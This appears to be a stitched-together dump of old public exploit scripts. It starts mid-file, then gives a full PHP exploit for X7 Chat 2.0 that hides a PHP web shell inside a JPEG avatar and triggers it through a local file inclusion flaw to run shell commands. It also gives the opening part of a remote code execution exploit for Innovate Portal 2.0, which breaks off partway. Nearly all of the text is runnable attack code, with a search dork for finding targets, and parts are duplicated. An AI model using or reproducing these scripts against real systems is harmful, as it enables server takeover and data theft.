#echo "\r\n".$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
srand(make_seed());
$v = rand(1,99);
echo "step 1 -> register...\r\n";
$data="username=suntzu".$v;
$data.="&pass1=suntzu";
$data.="&pass2=suntzu";
$data.="&email=suntzu".$v."@hotmail.com";
$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
echo "step 2 -> login...\r\n";
$data="dologin=dologin";
$data.="&username=suntzu".$v;
$data.="&password=suntzu";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);$cookie=$temp2[0];
$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0];
if ($cookie=="") {die("Failed to login...\r\n");}
echo "Cookie -> ".$cookie."\r\n";
echo "step 3 -> upload an avatar...\r\n";
$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20).
chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).
chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).
chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).
chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).
chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).
chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f).
chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27).
chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).
chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f).
chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e).
chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69).
chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).
chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).
chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69).
chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35).
chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a).
chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).
chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).
chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09).
chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).
chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).
chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00);
$data='-----------------------------7d63ba6e09fc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5242880
-----------------------------7d63ba6e09fc
Content-Disposition: form-data; name="avatar"; filename="whatever.jpg"
Content-Type: image/jpeg
'.$shell.'
-----------------------------7d63ba6e09fc--
';
echo "step 4 -> launch commands...\r\n";
$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg");
$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"56789"))
{
echo "Exploit succeeded...\r\n\r\n";
$temp=explode("56789",$html);
echo $temp[1];
die;
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-05-02]
rgod/x7chatphp.txt ( na)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "-> works regardless of magic_quotes_gpc settings\r\n";
echo " if avatar uploads are enabled (default)\r\n";
echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to X7\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n";
echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}
/*
software site: http://www.x7chat.com/
description: "X7 Chat is free, open source, software written in PHP"
vulnerable code in help/index.php at lines 32-37:
...
if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){
$_GET['help_file'] = "main";
}
// Load the help definitions
include("./{$_GET['help_file']}");
...
so, you can view/include all files on target system, poc:
http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd
this tool upload an avatar with php code as EXIF metadata content, then:
http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg&cmd=ls%20-la
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
srand(make_seed());
$v = rand(1,99);
echo "step 1 -> register...\r\n";
$data="username=suntzu".$v;
$data.="&pass1=suntzu";
$data.="&pass2=suntzu";
$data.="&email=suntzu".$v."@hotmail.com";
$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
echo "step 2 -> login...\r\n";
$data="dologin=dologin";
$data.="&username=suntzu".$v;
$data.="&password=suntzu";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);$cookie=$temp2[0];
$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0];
if ($cookie=="") {die("Failed to login...\r\n");}
echo "Cookie -> ".$cookie."\r\n";
echo "step 3 -> upload an avatar...\r\n";
$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20).
chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).
chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).
chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).
chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).
chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).
chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f).
chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27).
chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).
chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f).
chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e).
chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69).
chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).
chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).
chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69).
chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35).
chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a).
chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).
chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d).
chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).
chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09).
chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).
chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).
chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00);
$data='-----------------------------7d63ba6e09fc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5242880
-----------------------------7d63ba6e09fc
Content-Disposition: form-data; name="avatar"; filename="whatever.jpg"
Content-Type: image/jpeg
'.$shell.'
-----------------------------7d63ba6e09fc--
';
echo "step 4 -> launch commands...\r\n";
$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg");
$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"56789"))
{
echo "Exploit succeeded...\r\n\r\n";
$temp=explode("56789",$html);
echo $temp[1];
die;
}
//if you are here...
echo "Exploit failed...";
?>
Exploit for X7 Chat version 2.0 and below that makes use of an arbitrary local file inclusion flaw that allows for code execution.
Kacper/Innovate Portal <= 2.0 (acp.php) Remote Code Execution Exploit ( php)
<?
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
Innovate Portal <= 2.0 Remote Code Execution Exploit
[Script name: Innovate Portal v2.0
[Script site: http://www.innovate-board.de/
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam <========
Contact: kacper1964@yahoo.pl
or
http://www.rahim.webd.pl/
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky,
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group mambers ;-)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
in file acp.php:
line 41-45:
....
if(isset($_REQUEST['content'])) {
if(!file_exists('./admincp/'.$_REQUEST['content'].'.php')) {
error('error','cant_administrate');
}
include('./admincp/'.$_REQUEST['content'].'.php'); // <------- {1}
....
in file content/usercp.php:
line 93-123:
....
if($_REQUEST['action'] == 'avatar') {
if(!empty($_REQUEST['do']) && $_REQUEST['do'] == 'update') {
if(isset($_REQUEST['use_avatar']) && $_REQUEST['use_avatar'] == 0) {
if(file_exists('./images/avatars/'.$user['avatar'])) {
@unlink('./images/avatars/'.$user['avatar']);
}
$db->unbuffered_query("UPDATE ip".$n."_usersettings SET avatar='' WHERE setting_userid='".$user['userid']."'");
}
if(isset($_FILES['avatar']) && is_array($_FILES['avatar'])) {
if(file_exists('./images/avatars/'.$user['avatar'])) {
@unlink('./images/avatars/'.$user['avatar']);
}
$avatartype = get_file_extension($_FILES['avatar']['name']);
if(move_uploaded_file($_FILES['avatar']['tmp_name'],'./images/avatars/'.$user['userid'].'.'.addslashes($avatartype))) { // <------- !!!{2}
$imagesizes = getimagesize('./images/avatars/'.$user['userid'].'.'.addslashes($avatartype));
$filesize = filesize('./images/avatars/'.$user['userid'].'.'.addslashes($avatartype));
if($imagesizes[0] > $config['upload_avatar_width'] || $imagesizes[1] > $config['upload_avatar_height'] || $filesize > $config['upload_avatar_size']) {
@unlink('./images/avatars/'.$user['userid'].'.'.addslashes($avatartype));
$db->unbuffered_query("UPDATE ip".$n."_usersettings SET avatar='' WHERE setting_userid='".$user['userid']."'");
error('error','upload_istobig');
}
$db->unbuffered_query("UPDATE ip".$n."_usersettings SET avatar='".$user['userid'].'.'.addslashes($avatartype)."' WHERE setting_userid='".$user['userid']."'");
}
$centercontent .= msgbox(get_lang('usercp','update_succ') , 'index.php?content=usercp&action=avatar&sid='.$sid);
}
}
else {
eval('$cvalue = "'.$tpl->get('content_usercp_avatar').'";');
$centercontent .= newtable(get_lang('usercp','header_styles'),$cvalue);
}
}
....
*/
if ($argc<7) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path username password user_id cmd OPTIONS
host: target server (ip/hostname)
path: Innovate_Portal path
username: Hauru
password: devilteam
user_id: You user ID (id=)
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Innovate_Portal/ ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / -p81
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
